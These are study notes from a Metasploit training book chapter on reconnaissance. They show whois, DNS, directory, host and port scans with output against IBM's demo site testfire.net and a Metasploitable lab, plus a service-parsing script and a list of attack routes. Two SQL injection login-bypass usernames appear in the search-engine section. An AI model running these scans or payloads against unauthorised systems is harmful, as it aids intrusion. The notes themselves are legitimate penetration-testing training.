《Metasploit 魔鬼训练营》 03: Intelligence Gathering Techniques

These notes record, step by step, how I learned to use Metasploit on Kali Linux 2017.1.

  1. Perimeter information gathering
  2. Host discovery and port scanning
  3. Service scanning and enumeration
  4. Network vulnerability scanning
  5. Penetration-testing database and sharing

###1. testfire.net###

testfire.net is a simulated banking website that contains many typical web vulnerabilities; IBM set it up as a test site to demonstrate AppScan.

###2. Mining target network information through DNS and IP addresses###

1. whois: domain registration lookup
	Returns the domain owner, registrar, administrator e-mail address, registration date and expiry date

msf > whois testfire.net
[*] exec: whois testfire.net
   Domain Name: TESTFIRE.NET
   Registry Domain ID: 8363973_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.corporatedomains.com
   Registrar URL: http://www.cscglobal.com/global/web/csc/digital-brand-services.html
   Updated Date: 2017-07-19T05:16:54Z
   Creation Date: 1999-07-23T13:52:32Z
   Registry Expiry Date: 2018-07-23T13:52:32Z
   Registrar: CSC Corporate Domains, Inc.
   Registrar IANA ID: 299
   Registrar Abuse Contact Email: [email protected]
   Registrar Abuse Contact Phone: 8887802723
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: ASIA3.AKAM.NET
   Name Server: EUR2.AKAM.NET
   Name Server: EUR5.AKAM.NET
   Name Server: NS1-206.AKAM.NET
   Name Server: NS1-99.AKAM.NET
   Name Server: USC2.AKAM.NET
   Name Server: USC3.AKAM.NET
   Name Server: USW2.AKAM.NET
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2017-08-28T07:19:35Z <<<

2. nslookup: resolve a domain name to its IP address
root@attacker:~# nslookup 
> set type=A		# query A records (resolve the name to an IP address)
> testfire.net
Server:		10.10.10.2
Address:	10.10.10.2#53

Non-authoritative answer:
Name:	testfire.net
Address: 65.61.137.117
> exit

root@attacker:~# nslookup 
> set type=MX
> testfire.net
Server:		10.10.10.2
Address:	10.10.10.2#53

Non-authoritative answer:
*** Can't find testfire.net: No answer

Authoritative answers can be found from:
testfire.net
	origin = asia3.akam.net
	mail addr = hostmaster.akamai.com
	serial = 1366025603
	refresh = 43200
	retry = 7200
	expire = 604800
	minimum = 86400

3. dig: query the official (authoritative) DNS server directly for a precise authoritative answer
root@attacker:~# dig @ns.watson.ibm.com testfire.net
; <<>> DiG 9.10.3-P4-Debian <<>> @ns.watson.ibm.com testfire.net
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 35209
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;testfire.net.			IN	A

;; Query time: 302 msec
;; SERVER: 129.34.20.80#53(129.34.20.80)
;; WHEN: Mon Aug 28 03:32:52 EDT 2017
;; MSG SIZE  rcvd: 41

4. IP2Location: look up the geographic location of an IP address
	For IPs outside China: https://www.maxmind.com/zh/home (use its GeoIP service)
	For IPs inside China: www.cz88.net
5. netcraft: find a site's subdomains
	http://searchdns.netcraft.com/
	For a more detailed site report: http://toolbar.netcraft.com/site_report
6. IP2Domain: reverse lookup from IP to domain
	Mainly used to find the different virtual hosts that share one IP address
	For IPs outside China: www.ip-address.com/reverse_ip/65.61.137.117
	For IPs inside China: http://www.7c.com/

###3. Information gathering through search engines###

1. Google Hacking
Browse the Google Hacking Database: https://www.exploit-db.com/google-hacking-database/
Automated tool SiteDigger, download link: https://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
		   Search Diggity, download link: 
2. Exploring the site's directory structure
Searching Google for "parent directory site:testfire.net" returns demo.testfire.net - /bank/
inc files: site configuration information
bak: backup files
sql or txt: SQL scripts

The msf auxiliary modules brute_dirs, dir_listing and dir_scanner can do the same job.
Taking dir_scanner as an example:
msf > use auxiliary/scanner/http/dir_scanner 
msf auxiliary(dir_scanner) > show options

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                               yes       The target address range or CIDR identifier
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     1                                                        yes       The number of concurrent threads
   VHOST                                                                no        HTTP server virtual host

msf auxiliary(dir_scanner) > set THREADS 50
THREADS => 50
msf auxiliary(dir_scanner) > set RHOSTS www.testfire.net
RHOSTS => www.testfire.net
msf auxiliary(dir_scanner) > exploit 
	[*] Detecting error code
	[*] Using code '404' as not found for 65.61.137.117
	[*] Found http://65.61.137.117:80/Admin/ 403 (65.61.137.117)
	[*] Found http://65.61.137.117:80/admin/ 403 (65.61.137.117)
	[*] Found http://65.61.137.117:80/bank/ 200 (65.61.137.117)
	[*] Found http://65.61.137.117:80/images/ 403 (65.61.137.117)
	[*] Found http://65.61.137.117:80/static/ 403 (65.61.137.117)
	[*] Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
The hidden directory Admin was discovered because the server answered 403 (forbidden) rather than 404 (not found).
If a robots.txt file is found in the web root it deserves attention: it states the rules crawlers are asked to follow when indexing the site.
3. Searching for files of a specific type
	Searching Google for site:testfire.net filetype:xls returns one document
		containing detailed contact information
4. Searching for e-mail addresses on the site
	Use the msf module search_email_collector
5. Searching for pages with an existing SQL injection
	Searching Google for site:testfire.net inurl:login gives the admin login URL
		Entering "admin 'OR' 1" as the username logs you in
		Entering "test OR 1=1--" as the username with any password also logs you in

###4. Host discovery and port scanning###

1. ICMP ping scan
	root@attacker:~# ping -c 5 www.dvssc.com
		PING www.dvssc.com (10.10.10.129) 56(84) bytes of data.
		64 bytes from www.dvssc.com (10.10.10.129): icmp_seq=1 ttl=64 time=0.322 ms
		64 bytes from www.dvssc.com (10.10.10.129): icmp_seq=2 ttl=64 time=0.211 ms
		64 bytes from www.dvssc.com (10.10.10.129): icmp_seq=3 ttl=64 time=0.247 ms
		--- www.dvssc.com ping statistics ---
		4 packets transmitted, 4 received, 0% packet loss, time 3055ms
		rtt min/avg/max/mdev = 0.211/0.253/0.322/0.045 ms

2. msf host-discovery modules
Path: /module/auxiliary/scanner/discovery/
The main ones are: arp_sweep, empty_udp, ipv6_multicast_ping, ipv6_neighbor, ipv6_neighbor_router_advertisement, udp_probe, udp_sweep
Commonly used:
	arp_sweep: uses ARP requests to enumerate all active hosts on the local LAN
	udp_sweep: sends UDP packets to check whether the specified hosts are alive and to discover the UDP services they run
msf > use auxiliary/scanner/discovery/arp_sweep 
msf auxiliary(arp_sweep) > show options 
Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24
RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50
THREADS => 50
msf auxiliary(arp_sweep) > run
[*] 10.10.10.1 appears to be up (VMware, Inc.).
[*] 10.10.10.2 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.129 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

3. Host discovery with Nmap
-sn: ping scan (ICMP) that finds the live hosts on the network
msf > nmap -sn 10.10.10.0/24
	[*] exec: nmap -sn 10.10.10.0/24
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 21:43 EDT
	Nmap scan report for 10.10.10.1
	Host is up (0.00026s latency).
	MAC Address: 00:50:56:C0:00:08 (VMware)
	Nmap scan report for 10.10.10.2
	Host is up (0.00048s latency).
	MAC Address: 00:50:56:F1:2E:08 (VMware)
	Nmap scan report for www.dvssc.com (10.10.10.129)
	Host is up (0.00019s latency).
	MAC Address: 00:0C:29:21:A3:A6 (VMware)
	Nmap scan report for gate.dvssc.com (10.10.10.254)
	Host is up (0.000076s latency).
	MAC Address: 00:0C:29:19:70:BF (VMware)
	Nmap scan report for attacker.dvssc.com (10.10.10.128)
	Host is up.
	Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds
-Pn: skip the ping scan
-PU: host discovery by probing UDP ports. By default nmap would also list open TCP ports; combined with -sn it only checks which hosts are alive and does not scan TCP ports
msf > nmap -PU -sn 10.10.10.0/24
	[*] exec: nmap -PU -sn 10.10.10.0/24
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 21:49 EDT
	Nmap scan report for 10.10.10.1
	Host is up (0.00025s latency).
	MAC Address: 00:50:56:C0:00:08 (VMware)
	Nmap scan report for 10.10.10.2
	Host is up (0.0013s latency).
	MAC Address: 00:50:56:F1:2E:08 (VMware)
	Nmap scan report for www.dvssc.com (10.10.10.129)
	Host is up (0.000073s latency).
	MAC Address: 00:0C:29:21:A3:A6 (VMware)
	Nmap scan report for gate.dvssc.com (10.10.10.254)
	Host is up (0.00017s latency).
	MAC Address: 00:50:56:E7:DA:ED (VMware)
	Nmap scan report for attacker.dvssc.com (10.10.10.128)
	Host is up.
	Nmap done: 256 IP addresses (5 hosts up) scanned in 2.00 seconds

4. Operating system identification
-O: identify the target's operating system
msf > nmap -O 10.10.10.0/24
	[*] exec: nmap -O 10.10.10.0/24
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 21:51 EDT
	Nmap scan report for 10.10.10.1
	Host is up (0.000081s latency).
	Not shown: 987 closed ports
	PORT      STATE SERVICE
	135/tcp   open  msrpc
	139/tcp   open  netbios-ssn
	443/tcp   open  https
	445/tcp   open  microsoft-ds
	902/tcp   open  iss-realsecure
	912/tcp   open  apex-mesh
	6000/tcp  open  X11
	24800/tcp open  unknown
	49152/tcp open  unknown
	49153/tcp open  unknown
	49156/tcp open  unknown
	49161/tcp open  unknown
	49163/tcp open  unknown
	MAC Address: 00:50:56:C0:00:08 (VMware)
	Device type: general purpose
	Running: Microsoft Windows Vista|7|8.1
	OS CPE: cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1
	OS details: Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1
	Network Distance: 1 hop

	Nmap scan report for 10.10.10.2
	Host is up (0.000086s latency).
	All 1000 scanned ports on 10.10.10.2 are closed
	MAC Address: 00:50:56:F1:2E:08 (VMware)
	Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
	Device type: specialized
	Running: VMware Player
	OS CPE: cpe:/a:vmware:player
	OS details: VMware Player virtual NAT device
	Network Distance: 1 hop

	Nmap scan report for www.dvssc.com (10.10.10.129)
	Host is up (0.00022s latency).
	Not shown: 991 closed ports
	PORT     STATE SERVICE
	22/tcp   open  ssh
	80/tcp   open  http
	139/tcp  open  netbios-ssn
	143/tcp  open  imap
	443/tcp  open  https
	445/tcp  open  microsoft-ds
	5001/tcp open  commplex-link
	8080/tcp open  http-proxy
	8081/tcp open  blackice-icecap
	MAC Address: 00:0C:29:21:A3:A6 (VMware)
	Device type: general purpose
	Running: Linux 2.6.X
	OS CPE: cpe:/o:linux:linux_kernel:2.6
	OS details: Linux 2.6.17 - 2.6.36
	Network Distance: 1 hop

	Nmap scan report for gate.dvssc.com (10.10.10.254)
	Host is up (0.00021s latency).
	Not shown: 977 closed ports
	PORT     STATE SERVICE
	21/tcp   open  ftp
	22/tcp   open  ssh
	23/tcp   open  telnet
	25/tcp   open  smtp
	53/tcp   open  domain
	80/tcp   open  http
	111/tcp  open  rpcbind
	139/tcp  open  netbios-ssn
	445/tcp  open  microsoft-ds
	512/tcp  open  exec
	513/tcp  open  login
	514/tcp  open  shell
	1099/tcp open  rmiregistry
	1524/tcp open  ingreslock
	2049/tcp open  nfs
	2121/tcp open  ccproxy-ftp
	3306/tcp open  mysql
	5432/tcp open  postgresql
	5900/tcp open  vnc
	6000/tcp open  X11
	6667/tcp open  irc
	8009/tcp open  ajp13
	8180/tcp open  unknown
	MAC Address: 00:50:56:E7:DA:ED (VMware)
	Device type: general purpose
	Running: Linux 2.6.X
	OS CPE: cpe:/o:linux:linux_kernel:2.6
	OS details: Linux 2.6.9 - 2.6.33
	Network Distance: 1 hop

	Nmap scan report for attacker.dvssc.com (10.10.10.128)
	Host is up (0.000057s latency).
	Not shown: 999 closed ports
	PORT   STATE SERVICE
	22/tcp open  ssh
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.8 - 4.6
	Network Distance: 0 hops

	OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 256 IP addresses (5 hosts up) scanned in 7.17 seconds

5. Port scanning and service type detection
	msf > search portscan
	Matching Modules
	================

	   Name                                              Disclosure Date  Rank    Description
	   ----                                              ---------------  ----    -----------
	   auxiliary/scanner/http/wordpress_pingback_access                   normal  Wordpress Pingback Locator
	   auxiliary/scanner/natpmp/natpmp_portscan                           normal  NAT-PMP External Port Scanner
	   auxiliary/scanner/portscan/ack                                     normal  TCP ACK Firewall Scanner
	   auxiliary/scanner/portscan/ftpbounce                               normal  FTP Bounce Port Scanner
	   auxiliary/scanner/portscan/syn                                     normal  TCP SYN Port Scanner
	   auxiliary/scanner/portscan/tcp                                     normal  TCP Port Scanner
	   auxiliary/scanner/portscan/xmas                                    normal  TCP "XMas" Port Scanner
	   auxiliary/scanner/sap/sap_router_portscanner                       normal  SAPRouter Port Scanner

	The scanning modules:
		natpmp_portscan
		ack: uses ACK packets to probe for ports not filtered by a firewall
		ftpbounce: enumerates TCP services using the FTP bounce technique
		syn: detects open ports by sending packets with the TCP SYN flag set
		tcp: determines whether a port is open by completing a full TCP connection
		xmas: sends packets with the FIN, PSH and URG flags set; relatively stealthy

	msf > use auxiliary/scanner/portscan/syn 
	msf auxiliary(syn) > show options 

	Module options (auxiliary/scanner/portscan/syn):

	   Name       Current Setting  Required  Description
	   ----       ---------------  --------  -----------
	   BATCHSIZE  256              yes       The number of hosts to scan per set
	   DELAY      0                yes       The delay between connections, per thread, in milliseconds
	   INTERFACE                   no        The name of the interface
	   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
	   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
	   RHOSTS                      yes       The target address range or CIDR identifier
	   SNAPLEN    65535            yes       The number of bytes to capture
	   THREADS    1                yes       The number of concurrent threads
	   TIMEOUT    500              yes       The reply read timeout in milliseconds

	msf auxiliary(syn) > set RHOSTS 10.10.10.254
	RHOSTS => 10.10.10.254
	msf auxiliary(syn) > set THREADS 20
	THREADS => 20
	msf auxiliary(syn) > run
		[*]  TCP OPEN 10.10.10.254:22
		[*]  TCP OPEN 10.10.10.254:23
		[*]  TCP OPEN 10.10.10.254:53
		[*]  TCP OPEN 10.10.10.254:513
		[*]  TCP OPEN 10.10.10.254:514
		[*]  TCP OPEN 10.10.10.254:1099

6. Nmap port scanning
	Six port states: open, closed, filtered, unfiltered, open|filtered, closed|filtered
	Scan types:
		-sT: TCP connect scan
		-sS: TCP SYN scan
		-sF / -sX / -sN: send unusual flag combinations to evade detection
		-sP: send ICMP echo requests to check whether hosts are alive; same principle as ping
		-sU: find which UDP ports are open
		-sA: TCP ACK scan
		-sV: probe for more detailed service information
	Scan options:
	-Pn: do not send an ICMP echo request to test whether the target is alive before scanning
	-O: fingerprint the remote host to determine its operating system
	-F: fast scan; only the ports listed in nmap-services
	-p: specify the ports or port ranges to scan
	
	msf > nmap -sS -Pn 10.10.10.129
		[*] exec: nmap -sS -Pn 10.10.10.129
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 22:45 EDT
		Nmap scan report for www.dvssc.com (10.10.10.129)
		Host is up (0.00010s latency).
		Not shown: 991 closed ports
		PORT     STATE SERVICE
		22/tcp   open  ssh
		80/tcp   open  http
		139/tcp  open  netbios-ssn
		143/tcp  open  imap
		443/tcp  open  https
		445/tcp  open  microsoft-ds
		5001/tcp open  commplex-link
		8080/tcp open  http-proxy
		8081/tcp open  blackice-icecap
		MAC Address: 00:0C:29:21:A3:A6 (VMware)
		Nmap done: 1 IP address (1 host up) scanned in 0.20 second

7. Using nmap to obtain more detailed service information
	msf > nmap -sV -Pn 10.10.10.129
		[*] exec: nmap -sV -Pn 10.10.10.129
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 22:46 EDT
		Nmap scan report for www.dvssc.com (10.10.10.129)
		Host is up (0.000099s latency).
		Not shown: 991 closed ports
		PORT     STATE SERVICE     VERSION
		22/tcp   open  ssh         OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
		80/tcp   open  http        Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
		139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		143/tcp  open  imap        Courier Imapd (released 2008)
		443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
		445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		5001/tcp open  java-rmi    Java RMI
		8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
		8081/tcp open  http        Jetty 6.1.25
		1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
		SF-Port5001-TCP:V=7.40%I=7%D=8/28%Time=59A4D583%P=x86_64-pc-linux-gnu%r(NU
		SF:LL,4,"\xac\xed\0\x05");
		MAC Address: 00:0C:29:21:A3:A6 (VMware)
		Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds

	msf > nmap -sV -Pn 10.10.10.130
		[*] exec: nmap -sV -Pn 10.10.10.130
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 23:07 EDT
		Nmap scan report for service.dvssc.com (10.10.10.130)
		Host is up (0.00015s latency).
		Not shown: 985 closed ports
		PORT     STATE SERVICE         VERSION
		21/tcp   open  ftp             Microsoft ftpd
		80/tcp   open  http            Microsoft IIS httpd 6.0
		135/tcp  open  msrpc           Microsoft Windows RPC
		139/tcp  open  netbios-ssn     Microsoft Windows netbios-ssn
		445/tcp  open  microsoft-ds    Microsoft Windows 2003 or 2008 microsoft-ds
		777/tcp  open  multiling-http?
		1025/tcp open  msrpc           Microsoft Windows RPC
		1026/tcp open  msrpc           Microsoft Windows RPC
		1030/tcp open  msrpc           Microsoft Windows RPC
		1031/tcp open  msrpc           Microsoft Windows RPC
		1521/tcp open  oracle-tns      Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows)
		6002/tcp open  http            SafeNet Sentinel Protection Server httpd 7.3
		7001/tcp open  afs3-callback?
		7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
		8099/tcp open  http            Microsoft IIS httpd 6.0
		1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
		SF-Port777-TCP:V=7.40%I=7%D=8/28%Time=59A4DAC1%P=x86_64-pc-linux-gnu%r(Ker
		SF:beros,5,"\x01\0\t\xe0\x06")%r(SMBProgNeg,5,"\x01\0\t\xe0\x06")%r(Termin
		SF:alServer,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(WMSRequest,5,"\x01\0\t
		SF:\xe0\x06");
		MAC Address: 00:0C:29:DB:51:D2 (VMware)
		Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 149.72 seconds

	msf > nmap -sV -Pn 10.10.10.254
		[*] exec: nmap -sV -Pn 10.10.10.254
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 23:09 EDT
		Nmap scan report for gate.dvssc.com (10.10.10.254)
		Host is up (0.00024s latency).
		Not shown: 977 closed ports
		PORT     STATE SERVICE     VERSION
		21/tcp   open  ftp         vsftpd 2.3.4
		22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
		23/tcp   open  telnet      Linux telnetd
		25/tcp   open  smtp        Postfix smtpd
		53/tcp   open  domain      ISC BIND 9.4.2
		80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
		111/tcp  open  rpcbind     2 (RPC #100000)
		139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		512/tcp  open  exec        netkit-rsh rexecd
		513/tcp  open  login?
		514/tcp  open  tcpwrapped
		1099/tcp open  rmiregistry GNU Classpath grmiregistry
		1524/tcp open  ingreslock?
		2049/tcp open  nfs         2-4 (RPC #100003)
		2121/tcp open  ftp         ProFTPD 1.3.1
		3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
		5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
		5900/tcp open  vnc         VNC (protocol 3.3)
		6000/tcp open  X11         (access denied)
		6667/tcp open  irc         UnrealIRCd
		8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
		8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
		1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
		SF-Port1524-TCP:V=7.40%I=7%D=8/28%Time=59A4DAEE%P=x86_64-pc-linux-gnu%r(NU
		SF:LL,27,"\x1b\[01;31mroot@gate\x1b\[00m:\x1b\[01;34m/\x1b\[00m#\x20")%r(G
		MAC Address: 00:50:56:E7:DA:ED (VMware)
		Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 162.99 seconds

###5. Analysis of the scan results###

| Host | OS | Main open ports | Service version |
|---|---|---|---|
| Web server (10.10.10.129) | Linux | ssh(22) | OpenSSH 5.3p1 |
| | | http(80) | Apache httpd 2.2.14 |
| | | netbios-ssn(139) | Samba smbd 3.X - 4.X |
| | | imap(143) | Courier Imapd (released 2008) |
| | | ssl/http(443) | Apache httpd 2.2.14 |
| | | netbios-ssn(445) | Samba smbd 3.X - 4.X |
| | | java-rmi(5001) | Java RMI |
| | | http(8080) | Apache Tomcat/Coyote JSP engine 1.1 |
| Backend server (10.10.10.130) | Windows | ftp(21) | Microsoft ftpd |
| | | http(80) | Microsoft IIS httpd 6.0 |
| | | msrpc(135) | Microsoft Windows RPC |
| | | netbios-ssn(139) | Microsoft Windows netbios-ssn |
| | | microsoft-ds(445) | Microsoft Windows 2003 or 2008 microsoft-ds |
| | | msrpc(1025) | Microsoft Windows RPC |
| | | msrpc(1026) | Microsoft Windows RPC |
| | | msrpc(1030) | Microsoft Windows RPC |
| | | msrpc(1031) | Microsoft Windows RPC |
| | | oracle-tns(1521) | Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows) |
| | | http(6002) | SafeNet Sentinel Protection Server httpd 7.3 |
| | | http(7002) | SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console) |
| | | http(8099) | Microsoft IIS httpd 6.0 |
| Gateway server (10.10.10.254) | Linux | ftp(21) | vsftpd 2.3.4 |
| | | ssh(22) | OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) |
| | | telnet(23) | Linux telnetd |
| | | smtp(25) | Postfix smtpd |
| | | domain(53) | ISC BIND 9.4.2 |
| | | http(80) | Apache httpd 2.2.8 ((Ubuntu) DAV/2) |
| | | rpcbind(111) | 2 (RPC #100000) |
| | | netbios-ssn(139) | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
| | | netbios-ssn(445) | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
| | | exec(512) | netkit-rsh rexecd |
| | | rmiregistry(1099) | GNU Classpath grmiregistry |
| | | nfs(2049) | 2-4 (RPC #100003) |
| | | ftp(2121) | ProFTPD 1.3.1 |
| | | mysql(3306) | MySQL 5.0.51a-3ubuntu5 |
| | | postgresql(5432) | PostgreSQL DB 8.3.0 - 8.3.7 |
| | | vnc(5900) | VNC (protocol 3.3) |
| | | X11(6000) | (access denied) |
| | | irc(6667) | UnrealIRCd |
| | | ajp13(8009) | Apache Jserv (Protocol v1.3) |
| | | http(8180) | Apache Tomcat/Coyote JSP engine 1.1 |
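The summary above was compiled by hand from the nmap -sV reports. The Python script below is an added example (not code from the book, these notes or nmap) that parses nmap's plain-text report into a per-host inventory and flags open services whose protocols send credentials in the clear; the embedded report is a constructed excerpt of the gateway scan above, and the cleartext service list is my own selection.

```python
"""Rebuild the host/port/service/version summary from nmap -sV text output.

Added example for these notes (not code from the book or from Metasploit).
It parses the plain-text report nmap prints, as pasted in the sections
above, into a per-host service inventory and flags open services whose
protocols send credentials unencrypted (the exposure behind password
sniffing and guessing in a pentest plan).
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: an excerpt of the gate.dvssc.com report above.
SAMPLE_REPORT = """\
[*] exec: nmap -sV -Pn 10.10.10.254
Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 23:09 EDT
Nmap scan report for gate.dvssc.com (10.10.10.254)
Host is up (0.00024s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
23/tcp   open  telnet      Linux telnetd
53/tcp   open  domain      ISC BIND 9.4.2
513/tcp  open  login?
514/tcp  open  tcpwrapped
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
MAC Address: 00:50:56:E7:DA:ED (VMware)
Nmap done: 1 IP address (1 host up) scanned in 162.99 seconds
"""

# Protocols that transmit passwords in the clear (my selection; the
# r-services exec/login/shell are the classic netkit rexec/rlogin/rsh).
CLEARTEXT_SERVICES = {"ftp", "telnet", "exec", "login", "shell", "pop3", "imap"}

HOST_RE = re.compile(r"^Nmap scan report for (?P<label>.+)$")
IP_IN_PARENS_RE = re.compile(r"\((\d{1,3}(?:\.\d{1,3}){3})\)$")
# "21/tcp   open  ftp         vsftpd 2.3.4"  or  "513/tcp  open  login?"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str      # empty when nmap printed no VERSION column
    tentative: bool   # nmap appends '?' when it is unsure of the service


@dataclass
class Host:
    ip: str
    hostname: str     # empty when nmap printed only the address
    services: list = field(default_factory=list)


def parse_nmap_report(text: str) -> list:
    """Parse one or more concatenated nmap text reports into Host objects."""
    hosts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()                  # tolerate the indentation of pasted output
        host_match = HOST_RE.match(line)
        if host_match:
            label = host_match.group("label")
            ip_match = IP_IN_PARENS_RE.search(label)
            if ip_match:                    # "gate.dvssc.com (10.10.10.254)"
                current = Host(ip_match.group(1), label[: ip_match.start()].strip())
            else:                           # "10.10.10.1"
                current = Host(label, "")
            hosts.append(current)
            continue
        port_match = PORT_RE.match(line)
        if port_match and current is not None:
            name = port_match.group("service")
            current.services.append(Service(
                port=int(port_match.group("port")),
                proto=port_match.group("proto"),
                state=port_match.group("state"),
                name=name.rstrip("?"),
                version=(port_match.group("version") or "").strip(),
                tentative=name.endswith("?"),
            ))
    return hosts


def summary_rows(hosts: list) -> list:
    """(ip, 'service(port)', version) for every open port, like the table above."""
    return [(h.ip, f"{s.name}({s.port})", s.version)
            for h in hosts for s in h.services if s.state == "open"]


def cleartext_exposures(hosts: list) -> list:
    """(ip, port, service) for open services that carry credentials unencrypted."""
    return [(h.ip, s.port, s.name)
            for h in hosts for s in h.services
            if s.state == "open" and s.name in CLEARTEXT_SERVICES]


if __name__ == "__main__":
    parsed = parse_nmap_report(SAMPLE_REPORT)
    for ip, svc, ver in summary_rows(parsed):
        print(f"{ip:<14} {svc:<20} {ver}")
    for ip, port, svc in cleartext_exposures(parsed):
        print(f"cleartext credentials: {ip}:{port} ({svc})")
```

Feeding it the full -sV output pasted above (all three hosts concatenated) reproduces the table without hand copying, and the cleartext list is the first input to a hardening or monitoring plan.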

###6. Possible attack routes###

| Possible attack route | Target |
|---|---|
| Password guessing | 10.10.10.129: SSH, Samba |
| | 10.10.10.130: SMB |
| | 10.10.10.254: FTP, SSH, Telnet, MySQL, PostgreSQL |
| Password sniffing | 10.10.10.254: FTP, Telnet |
